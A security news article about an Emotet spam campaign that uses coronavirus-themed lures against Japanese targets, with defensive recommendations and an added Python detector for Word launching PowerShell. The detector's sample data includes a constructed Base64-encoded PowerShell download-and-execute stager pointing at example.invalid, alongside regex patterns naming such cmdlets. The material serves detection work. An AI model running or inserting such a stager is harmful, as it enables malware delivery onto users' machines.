Emotet Uses Coronavirus Scare in Latest Campaign, Targets Japan
January 31, 2020
Threat actors behind the Emotet malware used the novel coronavirus (2019-nCoV) scare as a hook for their spam email campaign against targets in Japan.
2019-nCoV, which is believed to have originated in Wuhan, China, has in the past month caused hundreds of deaths and thousands of confirmed cases in China alone. The virus has already spread to neighboring countries, and confirmed cases have been reported as far away as Germany, Canada, and the U.S., prompting the World Health Organization to declare a global health emergency. The Japanese Ministry of Health, Labour and Welfare has published an official advisory on the outbreak (in Japanese).
IBM X-Force reported that the coronavirus spam emails were disguised as official notifications sent by a disability welfare provider and public health centers. The email content warns recipients about the rapid spread of the virus, and instructs them to download an attached notice that allegedly contains preventive measures.
As in several previous campaigns, the coronavirus spam emails carried Word document attachments. The text in the document instructs the recipient to click the Enable Content button in order to view the document; doing so enables the embedded macro, which launches a PowerShell command that downloads and executes the Emotet payload.
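As an added illustration (not code from the original article or from any vendor), the following Python script shows detection logic for the delivery chain described above: an Office application spawning PowerShell, typically with a hidden window and a Base64-encoded command that downloads and runs the next stage. The event field names (Image, ParentImage, CommandLine, ProcessId) follow Sysmon Event ID 1 conventions; the sample events, the encoded script and the example.invalid URL are constructed for this example and are not taken from the campaign.

```python
"""Detect the Word macro -> PowerShell delivery chain in process-creation events.

Added example, not part of the original article. Field names mimic Sysmon
Event ID 1; the sample events below are constructed, not real telemetry.
"""
import base64
import json
import re

# Office applications that should never need to spawn a scripting host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Cmdlets and classes typically used by a download-and-execute stager.
SUSPICIOUS_PS = re.compile(
    r"(DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|Net\.WebClient"
    r"|Invoke-WebRequest|Start-Process)",
    re.IGNORECASE,
)
# -e / -ec / -en / -enc / -encodedcommand followed by a Base64 token.
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")


def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (UTF-16LE Base64), or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_event(event):
    """Return a list of reasons the event looks like a macro-launched stager.

    An empty list means nothing suspicious was found.
    """
    reasons = []
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")

    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"office-app-spawned-shell:{parent}->{child}")

    script = decode_encoded_command(cmdline)
    if script is not None:
        reasons.append("encoded-powershell-command")

    # Inspect the decoded script when present, else the raw command line.
    if SUSPICIOUS_PS.search(script if script is not None else cmdline):
        reasons.append("download-or-exec-cmdlet")
    if HIDDEN_WINDOW.search(cmdline):
        reasons.append("hidden-window")
    return reasons


def scan(events):
    """Return (ProcessId, reasons) for every event with at least one reason."""
    hits = []
    for event in events:
        reasons = analyze_event(event)
        if reasons:
            hits.append((event["ProcessId"], reasons))
    return hits


# Constructed sample data: a stager as a macro might launch it, plus two benign events.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/doc.ps1')"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENC}"},
    {"ProcessId": 4188,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ProcessId": 4200,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\user\Downloads\notice.doc"'},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS):
        print(json.dumps({"ProcessId": pid, "reasons": reasons}))
```

Only the first event fires, on all four indicators; a legitimate scheduled PowerShell script and Word itself opening a document produce no alert. The parent-child rule alone is the strongest signal and is worth alerting on by itself, since an Office process spawning a script host is rare in most environments.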
The spam emails include a footer with authentic-looking details such as a mailing address and contact numbers to lend the message credibility.
The campaign follows in the footsteps of previous Emotet spam email campaigns, which took advantage of well-known personalities and occasions such as Christmas to blast the emails.
Emotet infections can lead to the deployment of ransomware. The malware also drops other malware families that steal user credentials, browser history, and sensitive documents. Harvested email credentials can then be used to send spam from the compromised accounts to further targets.
Emotet was first detected by Trend Micro as TrojanSpy.Win32.EMOTET.THIBEAI in 2014. Back then, it was known as a banking malware variant that stole data by sniffing network activity. Over the years, the malware has evolved in many ways; later versions of Emotet act as a loader for other malware families and have added new evasion techniques.
Defense against Emotet
The Emotet malware persists as a threat as cybercriminals continue to increase not just the level of harm it brings, but also the sophistication of the social engineering techniques used to propagate it via email. Below are the recommendations for protecting the enterprise’s systems against Emotet:
- Carefully inspect emails, especially those that include links or attachments. If a message appears to come from a reputable institution, verify the sender by checking the contact details listed on the institution's official website rather than those printed in the email itself.
- Provide security awareness training to employees to teach them how to avoid email threats.
- Deploy the latest patches and updates for operating systems and applications.
- Ensure that antispam filters are properly configured.
- Adhere to the principle of least privilege.
Enterprises can thwart malware such as Emotet by adopting a multilayered security approach to protect all fronts (gateways, endpoints, networks, and servers).
Posted in Cybercrime & Digital Threats, botnets, malware